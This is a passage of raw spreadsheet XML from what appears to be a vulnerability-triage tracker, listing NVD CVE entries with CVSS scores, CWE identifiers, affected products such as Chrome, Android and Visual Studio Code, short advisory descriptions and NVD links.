t="inlineStr"><is><t>CVE-2026-84219</t></is></c><c r="D1190" s="5" t="n"><v>7.5</v></c><c r="E1190" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1190" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1190" s="5" t="inlineStr" /><c r="H1190" s="5" t="n"><v>0.002</v></c><c r="I1190" s="5" t="inlineStr" /><c r="J1190" s="5" t="inlineStr" /><c r="K1190" s="5" t="inlineStr" /><c r="L1190" s="5" t="inlineStr" /><c r="M1190" s="5" t="inlineStr" /><c r="N1190" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1190" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1190" s="5" t="inlineStr" /><c r="Q1190" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1190" s="5" t="inlineStr"><is><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is></c><c r="S1190" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84219</t></is></c></row><row r="1191"><c r="A1191" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1191" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1191" s="5" t="inlineStr"><is><t>CVE-2026-85045</t></is></c><c r="D1191" s="5" t="n"><v>7.5</v></c><c r="E1191" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1191" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1191" s="5" t="inlineStr" /><c r="H1191" s="5" t="n"><v>0.002</v></c><c r="I1191" s="5" t="inlineStr" /><c r="J1191" s="5" t="inlineStr" /><c r="K1191" s="5" t="inlineStr"><is><t>google:chrome</t></is></c><c r="L1191" s="5" t="inlineStr" /><c r="M1191" s="5" t="inlineStr" /><c r="N1191" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1191" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1191" s="5" t="inlineStr" /><c r="Q1191" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="R1191" s="5" t="inlineStr"><is><t>Race condition in V8 in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t></is></c><c r="S1191" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85045</t></is></c></row><row r="1192"><c r="A1192" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1192" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1192" s="5" t="inlineStr"><is><t>CVE-2026-85155</t></is></c><c r="D1192" s="5" t="n"><v>7.5</v></c><c r="E1192" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1192" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1192" s="5" t="inlineStr" /><c r="H1192" s="5" t="n"><v>0.003</v></c><c r="I1192" s="5" t="inlineStr" /><c r="J1192" s="5" t="inlineStr" /><c r="K1192" s="5" t="inlineStr" /><c r="L1192" s="5" t="inlineStr" /><c r="M1192" s="5" t="inlineStr" /><c r="N1192" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1192" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1192" s="5" t="inlineStr" /><c r="Q1192" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1192" s="5" t="inlineStr"><is><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is></c><c r="S1192" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85155</t></is></c></row><row r="1193"><c r="A1193" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1193" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1193" s="5" t="inlineStr"><is><t>CVE-2026-85400</t></is></c><c r="D1193" s="5" t="n"><v>7.5</v></c><c r="E1193" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1193" s="5" t="inlineStr"><is><t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t></is></c><c r="G1193" s="5" t="inlineStr" /><c r="H1193" s="5" t="n"><v>0.004</v></c><c r="I1193" s="5" t="inlineStr" /><c r="J1193" s="5" t="inlineStr" /><c r="K1193" s="5" t="inlineStr" /><c r="L1193" s="5" t="inlineStr" /><c r="M1193" s="5" t="inlineStr" /><c r="N1193" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1193" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1193" s="5" t="inlineStr" /><c r="Q1193" s="5" t="inlineStr"><is><t>CWE-266, CWE-862</t></is></c><c r="R1193" s="5" t="inlineStr"><is><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is></c><c r="S1193" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85400</t></is></c></row><row r="1194"><c r="A1194" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1194" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1194" s="5" t="inlineStr"><is><t>CVE-2026-86075</t></is></c><c r="D1194" s="5" t="n"><v>7.5</v></c><c r="E1194" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1194" s="5" t="inlineStr" /><c r="H1194" s="5" t="n"><v>0.003</v></c><c r="I1194" s="5" t="inlineStr" /><c r="J1194" s="5" t="inlineStr" /><c r="K1194" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1194" s="5" t="inlineStr" /><c r="M1194" s="5" t="inlineStr" /><c r="N1194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1194" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1194" s="5" t="inlineStr" /><c r="Q1194" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="R1194" s="5" t="inlineStr"><is><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is></c><c r="S1194" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86075</t></is></c></row><row r="1195"><c r="A1195" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1195" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1195" s="5" t="inlineStr"><is><t>CVE-2026-86250</t></is></c><c r="D1195" s="5" t="n"><v>7.5</v></c><c r="E1195" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1195" s="5" t="inlineStr" /><c r="H1195" s="5" t="n"><v>0.003</v></c><c r="I1195" s="5" t="inlineStr" /><c r="J1195" s="5" t="inlineStr" /><c r="K1195" s="5" t="inlineStr" /><c r="L1195" s="5" t="inlineStr" /><c r="M1195" s="5" t="inlineStr" /><c r="N1195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1195" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1195" s="5" t="inlineStr" /><c r="Q1195" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R1195" s="5" t="inlineStr"><is><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is></c><c r="S1195" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86250</t></is></c></row><row r="1196"><c r="A1196" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1196" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1196" s="5" t="inlineStr"><is><t>CVE-2026-86711</t></is></c><c r="D1196" s="5" t="n"><v>7.5</v></c><c r="E1196" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1196" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1196" s="5" t="inlineStr" /><c r="H1196" s="5" t="n"><v>0.001</v></c><c r="I1196" s="5" t="inlineStr" /><c r="J1196" s="5" t="inlineStr" /><c r="K1196" s="5" t="inlineStr" /><c r="L1196" s="5" t="inlineStr" /><c r="M1196" s="5" t="inlineStr" /><c r="N1196" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1196" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1196" s="5" t="inlineStr" /><c r="Q1196" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="R1196" s="5" t="inlineStr"><is><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is></c><c r="S1196" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86711</t></is></c></row><row r="1197"><c r="A1197" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1197" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1197" s="5" t="inlineStr"><is><t>CVE-2026-86721</t></is></c><c r="D1197" s="5" t="n"><v>7.5</v></c><c r="E1197" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1197" s="5" t="inlineStr" /><c r="H1197" s="5" t="n"><v>0.003</v></c><c r="I1197" s="5" t="inlineStr" /><c r="J1197" s="5" t="inlineStr" /><c r="K1197" s="5" t="inlineStr" /><c r="L1197" s="5" t="inlineStr" /><c r="M1197" s="5" t="inlineStr" /><c r="N1197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1197" s="5" t="inlineStr" /><c r="Q1197" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R1197" s="5" t="inlineStr"><is><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is></c><c r="S1197" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86721</t></is></c></row><row r="1198"><c r="A1198" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1198" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1198" s="5" t="inlineStr"><is><t>CVE-2026-86728</t></is></c><c r="D1198" s="5" t="n"><v>7.5</v></c><c r="E1198" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1198" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1198" s="5" t="inlineStr" /><c r="H1198" s="5" t="n"><v>0.003</v></c><c r="I1198" s="5" t="inlineStr" /><c r="J1198" s="5" t="inlineStr" /><c r="K1198" s="5" t="inlineStr" /><c r="L1198" s="5" t="inlineStr" /><c r="M1198" s="5" t="inlineStr" /><c r="N1198" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1198" s="5" t="inlineStr" /><c r="Q1198" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R1198" s="5" t="inlineStr"><is><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is></c><c r="S1198" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86728</t></is></c></row><row r="1199"><c r="A1199" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1199" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1199" s="5" t="inlineStr"><is><t>CVE-2026-19651</t></is></c><c r="D1199" s="5" t="n"><v>7.4</v></c><c r="E1199" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1199" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1199" s="5" t="inlineStr" /><c r="H1199" s="5" t="n"><v>0.003</v></c><c r="I1199" s="5" t="inlineStr" /><c r="J1199" s="5" t="inlineStr" /><c r="K1199" s="5" t="inlineStr" /><c r="L1199" s="5" t="inlineStr" /><c r="M1199" s="5" t="inlineStr" /><c r="N1199" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1199" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1199" s="5" t="inlineStr" /><c r="Q1199" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1199" s="5" t="inlineStr"><is><t>IBM Enterprise Build of Quarkus 3.27.1 through 3.27.5, and 3.33.1 through 3.33.3  could allow an attacker to bypass authorization by manipulating URL query parameters due to incorrect mapping of values to untrusted query string input.</t></is></c><c r="S1199" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19651</t></is></c></row><row r="1200"><c r="A1200" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1200" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1200" s="5" t="inlineStr"><is><t>CVE-2026-19683</t></is></c><c r="D1200" s="5" t="n"><v>7.4</v></c><c r="E1200" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1200" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1200" s="5" t="inlineStr" /><c r="H1200" s="5" t="n"><v>0.003</v></c><c r="I1200" s="5" t="inlineStr" /><c r="J1200" s="5" t="inlineStr" /><c r="K1200" s="5" t="inlineStr"><is><t>tp-link:dr3150, tp-link:dr3150_firmware, tp-link:dr3220v-4g, tp-link:dr3220v-4g_firmware, tp-link:dr3650v, tp-link:dr3650v-4g, tp-link:dr3650v-4g_firmware, tp-link:dr3650v_firmware, tp-link:er603wp-4g-outdoor, tp-link:er603wp-4g-outdoor_firmware</t></is></c><c r="L1200" s="5" t="inlineStr" /><c r="M1200" s="5" t="inlineStr" /><c r="N1200" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1200" s="5" t="inlineStr"><is><t>2026-08-20</t></is></c><c r="P1200" s="5" t="inlineStr" /><c r="Q1200" s="5" t="inlineStr"><is><t>CWE-319</t></is></c><c r="R1200" s="5" t="inlineStr"><is><t>A vulnerability exists in the Dynamic DNS (DDNS) functionality of TP-Link Omada Gateways. During communication with a third-party DDNS service, authentication credentials are transmitted over an unencrypted channel. An attacker who can observe or manipulate traffic between an affected device and the DDNS service may obtain sensitive authentication information or interfere with DDNS update operations. Exploitation requires DDNS to be configured, communication with an external DDNS service, and attacker visibility or control of the relevant network path. 





Successful exploitation may result in disclosure of DDNS account credentials, unauthorized access to DDNS management functionality, or modification of DNS records associated with the affected deployment.</t></is></c><c r="S1200" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19683</t></is></c></row><row r="1201"><c r="A1201" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1201" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1201" s="5" t="inlineStr"><is><t>CVE-2026-62906</t></is></c><c r="D1201" s="5" t="n"><v>7.4</v></c><c r="E1201" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1201" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1201" s="5" t="inlineStr" /><c r="H1201" s="5" t="n"><v>0.007</v></c><c r="I1201" s="5" t="inlineStr" /><c r="J1201" s="5" t="inlineStr" /><c r="K1201" s="5" t="inlineStr" /><c r="L1201" s="5" t="inlineStr" /><c r="M1201" s="5" t="inlineStr" /><c r="N1201" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1201" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1201" s="5" t="inlineStr" /><c r="Q1201" s="5" t="inlineStr"><is><t>CWE-943</t></is></c><c r="R1201" s="5" t="inlineStr"><is><t>Improper neutralization of special elements in data query logic in Microsoft Discovery Studio allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1201" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62906</t></is></c></row><row r="1202"><c r="A1202" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1202" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1202" s="5" t="inlineStr"><is><t>CVE-2026-69347</t></is></c><c r="D1202" s="5" t="n"><v>7.4</v></c><c r="E1202" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1202" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1202" s="5" t="inlineStr" /><c r="H1202" s="5" t="n"><v>0.003</v></c><c r="I1202" s="5" t="inlineStr" /><c r="J1202" s="5" t="inlineStr" /><c r="K1202" s="5" t="inlineStr" /><c r="L1202" s="5" t="inlineStr" /><c r="M1202" s="5" t="inlineStr" /><c r="N1202" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1202" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1202" s="5" t="inlineStr" /><c r="Q1202" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1202" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S1202" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69347</t></is></c></row><row r="1203"><c r="A1203" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1203" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1203" s="5" t="inlineStr"><is><t>CVE-2026-71375</t></is></c><c r="D1203" s="5" t="n"><v>7.4</v></c><c r="E1203" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1203" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G1203" s="5" t="inlineStr" /><c r="H1203" s="5" t="n"><v>0.002</v></c><c r="I1203" s="5" t="inlineStr" /><c r="J1203" s="5" t="inlineStr" /><c r="K1203" s="5" t="inlineStr" /><c r="L1203" s="5" t="inlineStr" /><c r="M1203" s="5" t="inlineStr" /><c r="N1203" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1203" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1203" s="5" t="inlineStr" /><c r="Q1203" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="R1203" s="5" t="inlineStr"><is><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is></c><c r="S1203" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71375</t></is></c></row><row r="1204"><c r="A1204" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1204" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1204" s="5" t="inlineStr"><is><t>CVE-2026-76196</t></is></c><c r="D1204" s="5" t="n"><v>7.4</v></c><c r="E1204" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1204" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1204" s="5" t="inlineStr" /><c r="H1204" s="5" t="n"><v>0.002</v></c><c r="I1204" s="5" t="inlineStr" /><c r="J1204" s="5" t="inlineStr" /><c r="K1204" s="5" t="inlineStr"><is><t>adobe:photoshop_mobile</t></is></c><c r="L1204" s="5" t="inlineStr" /><c r="M1204" s="5" t="inlineStr" /><c r="N1204" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1204" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1204" s="5" t="inlineStr" /><c r="Q1204" s="5" t="inlineStr"><is><t>CWE-384</t></is></c><c r="R1204" s="5" t="inlineStr"><is><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is></c><c r="S1204" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76196</t></is></c></row><row r="1205"><c r="A1205" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1205" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1205" s="5" t="inlineStr"><is><t>CVE-2026-78461</t></is></c><c r="D1205" s="5" t="n"><v>7.4</v></c><c r="E1205" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1205" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1205" s="5" t="inlineStr" /><c r="H1205" s="5" t="n"><v>0.01</v></c><c r="I1205" s="5" t="inlineStr" /><c r="J1205" s="5" t="inlineStr" /><c r="K1205" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L1205" s="5" t="inlineStr" /><c r="M1205" s="5" t="inlineStr" /><c r="N1205" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1205" s="5" t="inlineStr" /><c r="Q1205" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1205" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="S1205" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78461</t></is></c></row><row r="1206"><c r="A1206" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1206" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1206" s="5" t="inlineStr"><is><t>CVE-2026-81383</t></is></c><c r="D1206" s="5" t="n"><v>7.4</v></c><c r="E1206" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1206" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1206" s="5" t="inlineStr" /><c r="H1206" s="5" t="n"><v>0.007</v></c><c r="I1206" s="5" t="inlineStr" /><c r="J1206" s="5" t="inlineStr" /><c r="K1206" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L1206" s="5" t="inlineStr" /><c r="M1206" s="5" t="inlineStr" /><c r="N1206" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1206" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1206" s="5" t="inlineStr" /><c r="Q1206" s="5" t="inlineStr"><is><t>CWE-706</t></is></c><c r="R1206" s="5" t="inlineStr"><is><t>Use of incorrectly-resolved name or reference in Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1206" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81383</t></is></c></row><row r="1207"><c r="A1207" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1207" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1207" s="5" t="inlineStr"><is><t>CVE-2026-84003</t></is></c><c r="D1207" s="5" t="n"><v>7.4</v></c><c r="E1207" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1207" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1207" s="5" t="inlineStr" /><c r="H1207" s="5" t="n"><v>0.004</v></c><c r="I1207" s="5" t="inlineStr" /><c r="J1207" s="5" t="inlineStr" /><c r="K1207" s="5" t="inlineStr"><is><t>microsoft:azure\/msal-node</t></is></c><c r="L1207" s="5" t="inlineStr" /><c r="M1207" s="5" t="inlineStr" /><c r="N1207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1207" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1207" s="5" t="inlineStr" /><c r="Q1207" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="R1207" s="5" t="inlineStr"><is><t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="S1207" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t></is></c></row><row r="1208"><c r="A1208" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1208" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1208" s="5" t="inlineStr"><is><t>CVE-2026-15431</t></is></c><c r="D1208" s="5" t="n"><v>7.3</v></c><c r="E1208" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1208" s="5" t="inlineStr"><is><t>hp-security-alert@hp.com</t></is></c><c r="G1208" s="5" t="inlineStr" /><c r="H1208" s="5" t="n"><v>0.001</v></c><c r="I1208" s="5" t="inlineStr" /><c r="J1208" s="5" t="inlineStr" /><c r="K1208" s="5" t="inlineStr" /><c r="L1208" s="5" t="inlineStr" /><c r="M1208" s="5" t="inlineStr" /><c r="N1208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1208" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1208" s="5" t="inlineStr" /><c r="Q1208" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="R1208" s="5" t="inlineStr"><is><t>A potential security vulnerability has been identified in the HP Support
 Assistant for versions prior to 9.53.2.0. The vulnerability
               could potentially allow a local attacker to escalate 
privileges due to insufficient access controls.</t></is></c><c r="S1208" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15431</t></is></c></row><row r="1209"><c r="A1209" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1209" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1209" s="5" t="inlineStr"><is><t>CVE-2026-28613</t></is></c><c r="D1209" s="5" t="n"><v>7.3</v></c><c r="E1209" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1209" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1209" s="5" t="inlineStr" /><c r="H1209" s="5" t="n"><v>0.001</v></c><c r="I1209" s="5" t="inlineStr" /><c r="J1209" s="5" t="inlineStr" /><c r="K1209" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1209" s="5" t="inlineStr" /><c r="M1209" s="5" t="inlineStr" /><c r="N1209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1209" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1209" s="5" t="inlineStr" /><c r="Q1209" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R1209" s="5" t="inlineStr"><is><t>In initAppLinkTypeAndIntent of ChannelImpl.java, there is a possible launch an arbitrary intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="S1209" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28613</t></is></c></row><row r="1210"><c r="A1210" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1210" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1210" s="5" t="inlineStr"><is><t>CVE-2026-28626</t></is></c><c r="D1210" s="5" t="n"><v>7.3</v></c><c r="E1210" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1210" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1210" s="5" t="inlineStr" /><c r="H1210" s="5" t="n"><v>0.001</v></c><c r="I1210" s="5" t="inlineStr" /><c r="J1210" s="5" t="inlineStr" /><c r="K1210" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1210" s="5" t="inlineStr" /><c r="M1210" s="5" t="inlineStr" /><c r="N1210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1210" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1210" s="5" t="inlineStr" /><c r="Q1210" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="R1210" s="5" t="inlineStr"><is><t>In onCreate of SetupPassthroughActivity.java, there is a possible way to launch arbitrary activity due to Intent redirection . This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="S1210" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28626</t></is></c></row><row r="1211"><c r="A1211" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1211" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1211" s="5" t="inlineStr"><is><t>CVE-2026-28656</t></is></c><c r="D1211" s="5" t="n"><v>7.3</v></c><c r="E1211" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1211" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1211" s="5" t="inlineStr" /><c r="H1211" s="5" t="n"><v>0.001</v></c><c r="I1211" s="5" t="inlineStr" /><c r="J1211" s="5" t="inlineStr" /><c r="K1211" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1211" s="5" t="inlineStr" /><c r="M1211" s="5" t="inlineStr" /><c r="N1211" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1211" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1211" s="5" t="inlineStr" /><c r="Q1211" s="5" t="inlineStr"><is><t>CWE-1021</t></is></c><c r="R1211" s="5" t="inlineStr"><is><t>In multiple functions of DeviceAdminAdd.java, there is a possible way to an overlay due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="S1211" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28656</t></is></c></row><row r="1212"><c r="A1212" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1212" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1212" s="5" t="inlineStr"><is><t>CVE-2026-45528</t></is></c><c r="D1212" s="5" t="n"><v>7.3</v></c><c r="E1212" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1212" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1212" s="5" t="inlineStr" /><c r="H1212" s="5" t="n"><v>0.001</v></c><c r="I1212" s="5" t="inlineStr" /><c r="J1212" s="5" t="inlineStr" /><c r="K1212" s="5" t="inlineStr" /><c r="L1212" s="5" t="inlineStr" /><c r="M1212" s="5" t="inlineStr" /><c r="N1212" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1212" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1212" s="5" t="inlineStr" /><c r="Q1212" s="5" t="inlineStr"><is><t>CWE-926</t></is></c><c r="R1212" s="5" t="inlineStr"><is><t>In getManageSpaceActivityIntent of StorageManagerService.java, there is a possible LaunchAnyWhere chain due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="S1212" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45528</t></is></c></row><row r="1213"><c r="A1213" s="5" t="inlineStr"><is><t>P3 - 